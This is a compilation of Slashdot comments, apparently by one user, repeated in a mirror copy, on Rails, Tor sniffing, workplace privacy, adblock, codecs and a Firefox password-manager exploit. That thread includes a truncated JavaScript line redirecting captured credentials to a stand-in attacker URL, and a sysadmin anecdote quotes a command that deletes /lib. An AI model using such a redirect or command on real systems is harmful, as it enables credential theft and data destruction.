I stopped editing wikipedia due to some extremely biased, shrill, and bludgeon-you-with-the-rules (claim you were violating the rules when you weren't) editors.
Slam them in the discussion page with NPOV. The irony would not be lost:)
I have to agree with you. I've been through a few webprojects in perl, php, rails and struts. Perl is my favorite, but that has largely to do with the jobs I had to do in the past, and it's certainly not the only language to get to a solution.
The only thing that I'd have to agree with is that Rails does take up a bit more resources than the average PHP application (#4), but rails like any other framework does allow you access to your database. It's very well documented in Agile Web Development on Rails (not being paid, just giving an example I know of) where they introduce Active Record, and there's an small section on the subject itself. I'm pretty sure it's somwhere in the API reference as well.
Some languages are more suited than others for a certain project, so it's perhaps more important to do a proper analysis of what you want to achieve and what languages will help you most to achieve those goals. The author offers very little detail into what exactly went wrong with his project, except that it didn't go as smooth as planned (welcome to the 90% of all projects, pull up a chair and have a drink).
Finally, even though the article mentions he hired a programmer, it's often wise when learning a new language/API/tool to start with a small application so you'll get a firmer grasp on it. That way you'll get a better feel for possible trouble ahead. Sure, we don't all have the time to do that, but in that case it's often better to stick to what you know and what works for you instead of blindly charging forth and trying to ride the latest wave of technology buzzwords. Not that I'm saying that RoR is just a buzzword (it's pretty neat actually), but don't use it because it's hip. Use it because it solves a problem more easily than another language/framework.
Nope, those are the diapers these babies are still wearing.
Who invests money in 12 year olds? Who is so insane to do such a thing? Sure, 12 year olds can be bright, talented and even gifted, but I wouldn't trust a 12 year old with 6.5M $, nor his 11 year old vice-president of sales sister for that matter, to make correct business decisions.
I think it's time I try to sell this kid my 6.5M matchbox car. It's a classic collectors item, worth meeeeellions on ebay.
This is cruel. [snip] Each time you click on one of our ads you take somewhere between 5 cents to $1.00 directly out of our pocket.
What would be really cruel is laughing like Doctor Evil when I'm writing a bash script to do it for me. But in all seriousness...
If I wouldn't do this to my competitors, why would you do it to a random stranger?
My previous employer once spent an entire day looking for software to do exactly that. While he could 've just as easily done something productive that day, the fact that the keywords "linux consultancy" in our region made our biggest competitor show up at the top pissed him off.
So, he wasted a day where he could've easily made money, trying to cost someone else something like 100$. Some people are assholes, some people don't feel like working that day, and some people are just too envious for their own good (and some people are the three combined into one)
I'd mod you overrated, but knowing slashdot you'd be modded back up in a couple of minutes.
First of all, you didn't bother reading the article (yeah, I know, slashdot and all that). The sniffing happened at the exit nodes, which are the last nodes in the chain, which must communicate with whatever the client is trying to communicate. If the server you're trying to reach doesn't speak something encypted, tor doesn't magically make this encrypted.
Second, unless you're a complete dimwit, you know that traffic on the exit node is not secure. If you bother reading the website on how tor works, they explain to you that the exit node sends out traffic as is. So, if you set up an exit node, you can see whatever is unencrypted. This means, if you're running an exit node, you might be lucky enough to grab someone's login name and password from an unencrypted connection. Apparently you don't need too much luck though, since 5 exit nodes seems to be enough to collect a lot of passwords.
Finally, I don't really understand why embassies would want to use tor instead of their own proxy network which they can control themselves. Tor is more than obviously a bad choice for this kind of thing. Don't even get me started on non-encrypted transmission of sensitive data.
The end of "The Wrath of Khan" ends with a very personal showdown between Kirk and Khan.
I have to admit that this movie is the movie that made me fall in love with Trek at the time, even though I hadn't seen the episode from TOS where they first meet Khan. This movie is all about the showdown, and it's got a climax that very few Trek movies or episodes were able to live up to. The one movie that I think lived up to that kind of a climax was "First Contact", where Picard is on a mission to destroy the borg in the past whatever the cost may be.
If I were to nominate an episode as my personal favourite I'd have to say In The Pale Moonlight from DS9. Although not as action-packed as my favourite Trek movies, it's well written, superbly acted and directed, and when you've finished watching the episode you'll wish they'd 've made more episodes like this.
However, I simply hate what has happened to Trek in the past couple of years. I'm not going to go into a debate on what (or who) caused it, but the last series and to some extent the series before that killed off Trek for me.
Dear driver, you might be using a counterfeit engine. Contact Ford immediately to verify that your engine is indeed a real one, and not some piece of cardboard with "VROOM" written on it. Keep your credit card handy. You will have to wait at least 5 seconds every time you want to start your car, and every now and then your windshield wipers will pop up into view to remind you that your honestly purchased car may not contain a true Ford engine.
I don't know about the US, but down here (.be) we actually have privacy at work. It's what should keep nosy admins out of your mailbox, coworkers from listening in on your phonecalls, etc. You could argue that you shouldn't expect privacy at work, and that you shouldn't use work time for personal use, but most people actually get phonecalls from family and friends while they're at work, and slashdot is just full of people reading slashdot at work.
I personally don't use internet at work much for personal use, but it's handy to be able to check for mail and not have to worry that an admin is sniffing my packets without the proper paperwork. It doesn't mean that I spend 90% of my time reading my mail and refreshing slashdot (F5 F5 F5), but I do expect to be able to do those things.
Here your employer is allowed to make a statistical analysis of your internet activities for instance, and he can say "You've spent 4 hours every day last week reading non-work related internet sites", but he can't say "Last month you browsed to sexygirls.com, at this time, and that time, and that time". That would be a clear violation of your privacy at work, even though you shouldn't be visiting such sites at the workplace.
isn't that the very reason they call it private/personal time when you NOT at work
Yes, and if I were to draw a strict separation between personal time and work, I'd turn off my cellphone once the clock hits 5PM, hang up on the customer I was talking to, and drive off before someone can say "I think one of our servers just crashed". You'll find that less employers have problems with reading slashdot and checking your mail at work, than saying "Oh, I'm sorry, personal time just began".
My employer hires me to perform a task, and as long as I get that task done on time in an acceptable fashion, my employer shouldn't concern himself with what/how/where I do this task and what I do in between tasks. If my employer can't live with that, I'll find another job. Anything I do after hours for work, is the kind return for him being tolerant enough to let me browse slashdot and have the occasional non-work related phone call on my cellphone.
You're at work to do a job, not to give up your rights and become a slave for 8 (or more) hours a day.
how many people trusted him and "upgraded" themselves
I trust magazines 100% as well. Surely, magazines would do nothing so distasteful as promoting products of their corporate sponsors? In fact, I'm 100% sure that products these magazines review are tested to the highest standards, and that these "journalists" are objective and give fair scores to their products.
Does anyone still read the trash that these magazines produce and believe it? I find it hard to believe that in an age where you can find so much information about any subject (especially technical information), you'd choose to limit yourself to the opinion of magazines that have full page advertisments for said products and expect anything but biased opinions.
For what it's worth, I've worked with an "IT journalist" in the past. Great guy, good writer, didn't know anything about the more complex things in IT (which is a really bad omen if you'll be reviewing IT products that do "complex" things). One of the rules of "IT journalism" is that you're not allowed to trash something completely, no matter how bad it is. The reason for that is that people stop sending your products to review, and potential advertisers don't send their money in your magazines direction if their product gets a bad review.
This guy is either going to change his opinion soon, or will be looking for another job. End of the story.
Here's a hint to all website owners: advertisement is not a guaranteed revenue that pays for your bandwidth. If your plan to pay for your bandwidth relies on advertisement alone or for the most part, rethink it.
People have been claiming that popupblockers, adblock and whatnot have been "stealing their revenue" since the late 90s. This is for the most part caused by people who forget to do an analysis of what costs and what revenue they can get from their websites. I've seen this happen a lot times, and what happens in the end is that those guys complaining usually disappear because they just didn't think things through.
I've got adblock enabled for most sites. Popups annoy me (thanks firefox), flash stuff that makes sounds annoys me, flash stuff that could cause a seizure in an epileptic annoys me, etc etc. The few sites that I think are worthy of the extra revenue I disable, and if they ever put up flash stuff with sound they'll be blocked and never unblocked. The only thing that doesn't really annoy me is text-ads. Websites have mostly themselves to thank for this because they've made internet advertising so obnoxious and a pain in the neck.
So yeah, I'm stealing revenue from you. Revenue that you shouldn't be counting on in the first place, and revenue that makes me wonder if you actually thought things through properly before you started your business.
Corporate greed (aka making profit). The thing is that most people will sell their used books once they don't plan on playing anymore. (eg. you're moving, and your wife finds your old books (no, not those books)) TSR didn't have to deal with ebay and the internet as much as WoTC has to. If you look around for a while in appropriate places, I'm sure you can find all DnD 2 3 and 3.5 stuff on the net in PDF.
So what can you do to prevent people not buying your core rulebooks from ebay, or pirating (yarrrr) everything from the Internet? Release a new set of rules every x years. Die hard fans will buy it because well... they're die hard fans. Kids'll buy it because they have to get their gaming gear somewhere. The only ones who should be really pissed off are the people buying books about settings and extended rules.
I used to be a DM back in the day of 2nd ed for a regular group. I used to love the boxed sets that came with a bunch of adventures all ready, but most of them had certain rules that applied specifically to 2nd edition. It was pretty neat because not only did you have something that was basicly ready for play (after an initial reading), you'd get a few "new" monsters, and a fairly good storyline with most of those boxes, often spanning an adventure or 3 keeping a group busy for a while.
When the 3rd edition came out, many of these boxed sets got reprinted (a great many more did not). When 3rd ed came out it became increasingly difficult to get boxed sets for 2nd ed that weren't overpriced (as if they weren't expensive enough already). Didn't bother us for too long though, as soon some of us ended up getting married, moving away, etc... Fun times.
Unless we're going to be composing a Linux Administration HOWTO: Best of Bloopers.
I could fill about a 100 pages on my own from stupid things I've done and stupid things I've seen coworkers/customers do.
The funniest one is still one where one of my coworkers nuked/lib on a fairly important machine unintentionally because he just loves his spacebar:
rm -f/home/user/project/lib/*
Upon which of course by he proceeded to ask everyone "Hey, suppose I deleted something like/lib, is there a way to get it back?", followed by 10 people laughing, followed by a minute of silence as soon as we realized what machine he just did that on. He never got a root password for an important server after that incident. In hindsight, that was a funny incident, and a valuable lesson to us all (we all became paranoid of rereading what we just typed).
Yes, we had backups... Yes, tape drives are still slow
In the case you describe (user javascript on the same page as the login form) manually entered javascript is also affected...
Well, the exploit in question does deal with some user forging a login form and adding some javascript to a webpage on the domain he's visiting. From the article:
From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts.
there's not much you can do about that in the browser.
Nothing at all. Take a look at the code they present. They just wait a second so the password manager fills out the form, then get the values from the form. So, if you're able to do that on a webpage, you're able to do a lot worse. This isn't really a problem with just the password manager, it's an age old javascript problem now applied to the password manager. They could've easily applied it to a user manually entering a form and doing something with onSubmit.
Yeah, it's a problem, and no, password manager isn't really to blame. It's a problem because someone managed to add malicious code to your site. So, mozilla developers could disable password managers for pages that have javascript in them, which in our "web 2.0 world" (lol) means that 90% of the sites today wouldn't have the password manager available.
A right click in the login form would allow you to automatically enter saved information. It's much safer.
Actually, it wouldn't. It would prevent this simple javascript "exploit", but you can adjust the tactic for this. Now you would just either wait for the login form to lose focus or to be submitted. Click on the submit button, trigger the onSubmit handler that you can craft because someone was stupid enough to allow users to do javascript, and we're down the same road again.
You should never allow untrusted users to put javascript on your site (and to be on the safe side even HTML).
I call bullshit. If the "real problem might not be Firefox password manager", then why IE6 and IE7 password managers are not vulnerable?
Actually, the IE6 and IE7 password managers will most likely equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.
When the AutoComplete feature is set to save passwords, a password is automatically filled in when a known user name is provided, and the password and user name are stored by URL. When changing passwords, the user is prompted to save the new password.
So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.
Then redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)
Just stating the obvious, although now I'm actually curious if this works on IE...
To make Linux compelling, it has to give back to the community, rather than just piggybacking on the hard work of others.
Since when has writing a codec from a reference become "piggybacking" ? Writing our own set of codecs just to be free of patents and IP and what not is a very nice effort, but there has to be a real advantage to using that codec. What's more is that some companies will be hell bent on spoonfeeding the 95% of other users their favourite patented codec, so you're bound to have to support it if you want your OS on the desktop (or video server, or whatever).
I'm much more open to using Ogg than MP3
Yeah, OGG is so well supported. Let's see...
[ ] unmodded iPod
[ ] creative zen
[ ] my carstereo that plays mp3
[x] most linux distros
[x] windows after installing a codec with a "scary" GPL EULA
[ ] anything else
We could go into the debate on which one is actually better, but the truth is that it doesn't really matter. Ogg simply isn't widely supported where it matters, despite being open and free.
You're being forcefed codecs by people with lots of money, and unless you're going to make a codec that's vastly superior, which by itself is no small feat, you'll be forced to use them. It's a shame, but that's the sad part.
Please pay more attention in class, it will prevent you from making a fool out of yourself in the future.
I do not think that it is similar to a DoS attack because a DoS attack involves changing the source address in the packets that are sent to a server.
Please read up on Denial of Service, and please do some googling on your own. You will find that with a little effort you can find lots of information on this subject. Read up on why such things are possible, how people do this, and what you can do against it.
I do not think any students at Duke have found a way to hack the iphone
Irrelevant... Why would you need to hack an iphone when you can do equally as much damage with a laptop? Badly configured networks are just that: badly configured.
No, it's not crazy. Why did I (and thousands of others) stand line up for hours? If you would like a hint, pick up an iPhone and try to exploit its advertised features.
And the difference between standing in line and not standing in line would be what exactly? I believe the point would be that you can buy an iPhone, today, tomorrow, next week, next month and if it's still popular by then next year, without having to stand in line wasting perfectly good time.
The amount of time I spent in line is dwarfed by the amount of time I spend trying to learn how to use a fraction of the advertised features of whatever cellphone a plan offers me.
The amount of time I didn't spend in line was replaced by actual useful activities such as spending time with my family, doing a job, and having a drink with my friends. I've still got one of those "no nonsense" phones, without camera, e-mail, internet, gimmicks and widgets. I personally don't see the use of all those features on a cellphone, since I use it for two things: calling people and sending text messages.
I don't really see the use in having all those extras. I've got a digital camera that'll dwarf any phones built in camera, so if I need to take pictures of something I'll drag it along. I've got a laptop that I use for internet access, so I don't really need to have a phone that can access my e-mail or website. If people have an urgent message for me, they'll call me regardless of me having e-mail everywhere.
Life is too short to memorize arbitrary menu navigation.
Life is too short to stand in line for a phone, no matter how easily navigatable it is.
Due to the documentary-style special effects, the shaking camera put her viper at the top of the screen when it explodes.
You know, if the pressure can crush a hunk of metal like a beercan, it will crush the human body as well.
It's weird how many people believe what the characters are telling themselves (she's dead, Jim) rather than what the filmmakers are deliberately showing us
You're absolutely right. It's weird how people actually want to believe that people die when their ship explodes because of the high pressure, not to mention the fact that perhaps a person with an infatuation for the character who may or may not have been crushed to goo by that very same high pressure is having hallucinations (especially since it seems to be a common theme).
Quite frankly the writers have the following options:
The cylon ship captured her (as you suggested) and used their inflatomatic 5000 to turn her gooey remains into herself again (think balloonvendor and you're hitting the spot). She then overpowers the 20 toasters on board of said transport, manages to find a map in the cylon computer to earth, meets the a-team on her way back to the galactica, who will build her a new fighter using only a welding torch, a cigar and "a plan" which everyone calls "the jazz". Coincidentally, this "plan" is more of a plan than anything the writers of BSG ever came up with in their combined lifespans.
Kara respawns on earth in good old reincarnation style where they have some form of EFTFTL (Even Faster Than Faster Than Light) Drive allowing her to jump to the galactica as they are about to make a standoff against a small fleet of basestars. The fact that her reincarnated self is exactly as old as her former self can be explained by relativity (please forgive me Albert) and some weird side-effect of this wonderous EFTFTL drive. At this point, that kid that showed up 3 or 4 times in season 1 will come to save the day using particle of the week that cylon ships are defenseless against and all is well with the universe. At 9PM there will be drinks in the officers mess to celebrate the return of reincarnated Starbuck, at 9:30PM secret Cylon band practice as Tigh discovers the rubber band in his underwear can be used as a musical instrument.
1 word: wormhole. Yes, due to a very local wormhole, Kara gets sucked out of her cockpit just as she's reaching for her ejector lever. While normal matter would not survive this, Kara is of course "special" (or "chosen" whichever you prefer) and lands in some bed on earth without so much as a scratch. She immediatly falls in love with the man currently occupying that bed, who of course after 3 episodes worth of lovemaking kicks her out of his house so hard she's launched into space at such a great velocity she appears right on time for the big fight against the cylons. The cylons decide that this theory is so implausible they give up on the whole "let's find earth for our religion and kill all of mankind"-idea and just jump back home where they will live in peace for as long as their batteries allow them.
Kara is a cylon. Yep, that's right, there weren't the "final 5" cylons, but "final 6". This "error" is because machines start counting at 0 (oh, devious off by one error, how often shall we be the victim of your pranks). As her ship exploded, she is reborn aboard a basestar ship, remembers that her past was actually a hallucination caused by a pointer in her programming pointing to some bad memory, which she interpreted as the drama of her abusive mother dying of cancer. The cylons fix her programming, send her on a mission to once again gain the trust of the BSG crew. The cylons then pretend to be lost as the BSG approaches and clumsily ask directions to the nearest space-gas-station. The female cylon models blame the male cylon models for being stubborn, and the male cylon models blame the female cylon models for not being able to read the frackin' map.
Slashdot Mirror
Slam them in the discussion page with NPOV. The irony would not be lost :)
I have to agree with you. I've been through a few webprojects in perl, php, rails and struts. Perl is my favorite, but that has largely to do with the jobs I had to do in the past, and it's certainly not the only language to get to a solution.
The only thing that I'd have to agree with is that Rails does take up a bit more resources than the average PHP application (#4), but rails like any other framework does allow you access to your database. It's very well documented in Agile Web Development on Rails (not being paid, just giving an example I know of) where they introduce Active Record, and there's an small section on the subject itself. I'm pretty sure it's somwhere in the API reference as well.
Some languages are more suited than others for a certain project, so it's perhaps more important to do a proper analysis of what you want to achieve and what languages will help you most to achieve those goals. The author offers very little detail into what exactly went wrong with his project, except that it didn't go as smooth as planned (welcome to the 90% of all projects, pull up a chair and have a drink).
Finally, even though the article mentions he hired a programmer, it's often wise when learning a new language/API/tool to start with a small application so you'll get a firmer grasp on it. That way you'll get a better feel for possible trouble ahead. Sure, we don't all have the time to do that, but in that case it's often better to stick to what you know and what works for you instead of blindly charging forth and trying to ride the latest wave of technology buzzwords. Not that I'm saying that RoR is just a buzzword (it's pretty neat actually), but don't use it because it's hip. Use it because it solves a problem more easily than another language/framework.
Nope, those are the diapers these babies are still wearing.
Who invests money in 12 year olds? Who is so insane to do such a thing? Sure, 12 year olds can be bright, talented and even gifted, but I wouldn't trust a 12 year old with 6.5M $, nor his 11 year old vice-president of sales sister for that matter, to make correct business decisions.
I think it's time I try to sell this kid my 6.5M matchbox car. It's a classic collectors item, worth meeeeellions on ebay.
What would be really cruel is laughing like Doctor Evil when I'm writing a bash script to do it for me. But in all seriousness...
My previous employer once spent an entire day looking for software to do exactly that. While he could 've just as easily done something productive that day, the fact that the keywords "linux consultancy" in our region made our biggest competitor show up at the top pissed him off.
So, he wasted a day where he could've easily made money, trying to cost someone else something like 100$. Some people are assholes, some people don't feel like working that day, and some people are just too envious for their own good (and some people are the three combined into one)
I'd mod you overrated, but knowing slashdot you'd be modded back up in a couple of minutes.
First of all, you didn't bother reading the article (yeah, I know, slashdot and all that). The sniffing happened at the exit nodes, which are the last nodes in the chain, which must communicate with whatever the client is trying to communicate. If the server you're trying to reach doesn't speak something encypted, tor doesn't magically make this encrypted.
Second, unless you're a complete dimwit, you know that traffic on the exit node is not secure. If you bother reading the website on how tor works, they explain to you that the exit node sends out traffic as is. So, if you set up an exit node, you can see whatever is unencrypted. This means, if you're running an exit node, you might be lucky enough to grab someone's login name and password from an unencrypted connection. Apparently you don't need too much luck though, since 5 exit nodes seems to be enough to collect a lot of passwords.
Finally, I don't really understand why embassies would want to use tor instead of their own proxy network which they can control themselves. Tor is more than obviously a bad choice for this kind of thing. Don't even get me started on non-encrypted transmission of sensitive data.
If this worked, I'd be a rich man or just a very content man because of out of court settlements.
I have to admit that this movie is the movie that made me fall in love with Trek at the time, even though I hadn't seen the episode from TOS where they first meet Khan. This movie is all about the showdown, and it's got a climax that very few Trek movies or episodes were able to live up to. The one movie that I think lived up to that kind of a climax was "First Contact", where Picard is on a mission to destroy the borg in the past whatever the cost may be.
If I were to nominate an episode as my personal favourite I'd have to say In The Pale Moonlight from DS9. Although not as action-packed as my favourite Trek movies, it's well written, superbly acted and directed, and when you've finished watching the episode you'll wish they'd 've made more episodes like this.
However, I simply hate what has happened to Trek in the past couple of years. I'm not going to go into a debate on what (or who) caused it, but the last series and to some extent the series before that killed off Trek for me.
Dear driver, you might be using a counterfeit engine. Contact Ford immediately to verify that your engine is indeed a real one, and not some piece of cardboard with "VROOM" written on it. Keep your credit card handy. You will have to wait at least 5 seconds every time you want to start your car, and every now and then your windshield wipers will pop up into view to remind you that your honestly purchased car may not contain a true Ford engine.
I don't know about the US, but down here (.be) we actually have privacy at work. It's what should keep nosy admins out of your mailbox, coworkers from listening in on your phonecalls, etc. You could argue that you shouldn't expect privacy at work, and that you shouldn't use work time for personal use, but most people actually get phonecalls from family and friends while they're at work, and slashdot is just full of people reading slashdot at work.
I personally don't use internet at work much for personal use, but it's handy to be able to check for mail and not have to worry that an admin is sniffing my packets without the proper paperwork. It doesn't mean that I spend 90% of my time reading my mail and refreshing slashdot (F5 F5 F5), but I do expect to be able to do those things.
Here your employer is allowed to make a statistical analysis of your internet activities for instance, and he can say "You've spent 4 hours every day last week reading non-work related internet sites", but he can't say "Last month you browsed to sexygirls.com, at this time, and that time, and that time". That would be a clear violation of your privacy at work, even though you shouldn't be visiting such sites at the workplace.
Yes, and if I were to draw a strict separation between personal time and work, I'd turn off my cellphone once the clock hits 5PM, hang up on the customer I was talking to, and drive off before someone can say "I think one of our servers just crashed". You'll find that less employers have problems with reading slashdot and checking your mail at work, than saying "Oh, I'm sorry, personal time just began".
My employer hires me to perform a task, and as long as I get that task done on time in an acceptable fashion, my employer shouldn't concern himself with what/how/where I do this task and what I do in between tasks. If my employer can't live with that, I'll find another job. Anything I do after hours for work, is the kind return for him being tolerant enough to let me browse slashdot and have the occasional non-work related phone call on my cellphone.
You're at work to do a job, not to give up your rights and become a slave for 8 (or more) hours a day.
http://www.spectrum.ieee.org/jul07/5280 for those interested.
Aaaah, screw the whole thing
Who? No seriously, who is this guy?
I trust magazines 100% as well. Surely, magazines would do nothing so distasteful as promoting products of their corporate sponsors? In fact, I'm 100% sure that products these magazines review are tested to the highest standards, and that these "journalists" are objective and give fair scores to their products.
Does anyone still read the trash that these magazines produce and believe it? I find it hard to believe that in an age where you can find so much information about any subject (especially technical information), you'd choose to limit yourself to the opinion of magazines that have full page advertisments for said products and expect anything but biased opinions.
For what it's worth, I've worked with an "IT journalist" in the past. Great guy, good writer, didn't know anything about the more complex things in IT (which is a really bad omen if you'll be reviewing IT products that do "complex" things). One of the rules of "IT journalism" is that you're not allowed to trash something completely, no matter how bad it is. The reason for that is that people stop sending your products to review, and potential advertisers don't send their money in your magazines direction if their product gets a bad review.
This guy is either going to change his opinion soon, or will be looking for another job. End of the story.
Here's a hint to all website owners: advertisement is not a guaranteed revenue that pays for your bandwidth. If your plan to pay for your bandwidth relies on advertisement alone or for the most part, rethink it.
People have been claiming that popupblockers, adblock and whatnot have been "stealing their revenue" since the late 90s. This is for the most part caused by people who forget to do an analysis of what costs and what revenue they can get from their websites. I've seen this happen a lot times, and what happens in the end is that those guys complaining usually disappear because they just didn't think things through.
I've got adblock enabled for most sites. Popups annoy me (thanks firefox), flash stuff that makes sounds annoys me, flash stuff that could cause a seizure in an epileptic annoys me, etc etc. The few sites that I think are worthy of the extra revenue I disable, and if they ever put up flash stuff with sound they'll be blocked and never unblocked. The only thing that doesn't really annoy me is text-ads. Websites have mostly themselves to thank for this because they've made internet advertising so obnoxious and a pain in the neck.
So yeah, I'm stealing revenue from you. Revenue that you shouldn't be counting on in the first place, and revenue that makes me wonder if you actually thought things through properly before you started your business.
Corporate greed (aka making profit). The thing is that most people will sell their used books once they don't plan on playing anymore. (eg. you're moving, and your wife finds your old books (no, not those books)) TSR didn't have to deal with ebay and the internet as much as WoTC has to. If you look around for a while in appropriate places, I'm sure you can find all DnD 2 3 and 3.5 stuff on the net in PDF.
So what can you do to prevent people not buying your core rulebooks from ebay, or pirating (yarrrr) everything from the Internet? Release a new set of rules every x years. Die hard fans will buy it because well... they're die hard fans. Kids'll buy it because they have to get their gaming gear somewhere. The only ones who should be really pissed off are the people buying books about settings and extended rules.
I used to be a DM back in the day of 2nd ed for a regular group. I used to love the boxed sets that came with a bunch of adventures all ready, but most of them had certain rules that applied specifically to 2nd edition. It was pretty neat because not only did you have something that was basicly ready for play (after an initial reading), you'd get a few "new" monsters, and a fairly good storyline with most of those boxes, often spanning an adventure or 3 keeping a group busy for a while.
When the 3rd edition came out, many of these boxed sets got reprinted (a great many more did not). When 3rd ed came out it became increasingly difficult to get boxed sets for 2nd ed that weren't overpriced (as if they weren't expensive enough already). Didn't bother us for too long though, as soon some of us ended up getting married, moving away, etc... Fun times.
I could fill about a 100 pages on my own from stupid things I've done and stupid things I've seen coworkers/customers do.
The funniest one is still one where one of my coworkers nuked /lib on a fairly important machine unintentionally because he just loves his spacebar:
rm -f /home/user/project /lib/*
Upon which of course by he proceeded to ask everyone "Hey, suppose I deleted something like /lib, is there a way to get it back?", followed by 10 people laughing, followed by a minute of silence as soon as we realized what machine he just did that on. He never got a root password for an important server after that incident. In hindsight, that was a funny incident, and a valuable lesson to us all (we all became paranoid of rereading what we just typed).
Yes, we had backups... Yes, tape drives are still slow
WOOHOO! Just what I was looking for
I guess that means my karma is gone now, doesn't it? :)
Already slashdotted after the first comment, so ... this is what the future web-desktop will be like huh?
Well, the exploit in question does deal with some user forging a login form and adding some javascript to a webpage on the domain he's visiting. From the article:
Nothing at all. Take a look at the code they present. They just wait a second so the password manager fills out the form, then get the values from the form. So, if you're able to do that on a webpage, you're able to do a lot worse. This isn't really a problem with just the password manager, it's an age old javascript problem now applied to the password manager. They could've easily applied it to a user manually entering a form and doing something with onSubmit.
Yeah, it's a problem, and no, password manager isn't really to blame. It's a problem because someone managed to add malicious code to your site. So, mozilla developers could disable password managers for pages that have javascript in them, which in our "web 2.0 world" (lol) means that 90% of the sites today wouldn't have the password manager available.
Actually, it wouldn't. It would prevent this simple javascript "exploit", but you can adjust the tactic for this. Now you would just either wait for the login form to lose focus or to be submitted. Click on the submit button, trigger the onSubmit handler that you can craft because someone was stupid enough to allow users to do javascript, and we're down the same road again.
You should never allow untrusted users to put javascript on your site (and to be on the safe side even HTML).
Actually, the IE6 and IE7 password managers will most likely equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.
From the MSDN website I can quote:
So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.
document.location="http://some.hackers.url/collecThen redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)
Just stating the obvious, although now I'm actually curious if this works on IE...
Since when has writing a codec from a reference become "piggybacking" ? Writing our own set of codecs just to be free of patents and IP and what not is a very nice effort, but there has to be a real advantage to using that codec. What's more is that some companies will be hell bent on spoonfeeding the 95% of other users their favourite patented codec, so you're bound to have to support it if you want your OS on the desktop (or video server, or whatever).
Yeah, OGG is so well supported. Let's see...
[ ] unmodded iPod
[ ] creative zen
[ ] my carstereo that plays mp3
[x] most linux distros
[x] windows after installing a codec with a "scary" GPL EULA
[ ] anything else
We could go into the debate on which one is actually better, but the truth is that it doesn't really matter. Ogg simply isn't widely supported where it matters, despite being open and free.
You're being forcefed codecs by people with lots of money, and unless you're going to make a codec that's vastly superior, which by itself is no small feat, you'll be forced to use them. It's a shame, but that's the sad part.
Please pay more attention in class, it will prevent you from making a fool out of yourself in the future.
Please read up on Denial of Service, and please do some googling on your own. You will find that with a little effort you can find lots of information on this subject. Read up on why such things are possible, how people do this, and what you can do against it.
Irrelevant... Why would you need to hack an iphone when you can do equally as much damage with a laptop? Badly configured networks are just that: badly configured.
This is probably a troll, but I'll bite.
And the difference between standing in line and not standing in line would be what exactly? I believe the point would be that you can buy an iPhone, today, tomorrow, next week, next month and if it's still popular by then next year, without having to stand in line wasting perfectly good time.
The amount of time I didn't spend in line was replaced by actual useful activities such as spending time with my family, doing a job, and having a drink with my friends. I've still got one of those "no nonsense" phones, without camera, e-mail, internet, gimmicks and widgets. I personally don't see the use of all those features on a cellphone, since I use it for two things: calling people and sending text messages.
I don't really see the use in having all those extras. I've got a digital camera that'll dwarf any phones built in camera, so if I need to take pictures of something I'll drag it along. I've got a laptop that I use for internet access, so I don't really need to have a phone that can access my e-mail or website. If people have an urgent message for me, they'll call me regardless of me having e-mail everywhere.
Life is too short to stand in line for a phone, no matter how easily navigatable it is.
You know, if the pressure can crush a hunk of metal like a beercan, it will crush the human body as well.
You're absolutely right. It's weird how people actually want to believe that people die when their ship explodes because of the high pressure, not to mention the fact that perhaps a person with an infatuation for the character who may or may not have been crushed to goo by that very same high pressure is having hallucinations (especially since it seems to be a common theme).
Quite frankly the writers have the following options: